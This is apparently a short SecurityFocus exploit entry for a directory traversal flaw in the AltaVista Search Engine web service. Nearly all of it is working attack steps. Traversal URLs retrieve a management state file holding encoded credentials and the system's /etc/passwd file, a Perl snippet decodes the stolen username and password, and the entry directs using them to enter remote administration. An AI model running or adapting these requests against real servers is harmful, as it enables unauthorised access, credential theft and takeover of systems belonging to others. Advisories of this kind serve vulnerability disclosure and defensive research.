AltaVista Search Engine Directory Traversal Vulnerability

http://target:9000/cgi-bin/query?mss=../logs/mgtstate
(to get the mgtstate file.)

#!/usr/bin/perl
use MIME::Base64;
print decode_base64("$ARGV[0]"), "\n";
(to unencode the username/password)

http://target:9000/cgi-bin/mgt
and enter the username/password to access the remote administration features

or
http://target:9000/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
to get the password file on a unix system


 

Privacy Statement
Copyright 2010, SecurityFocus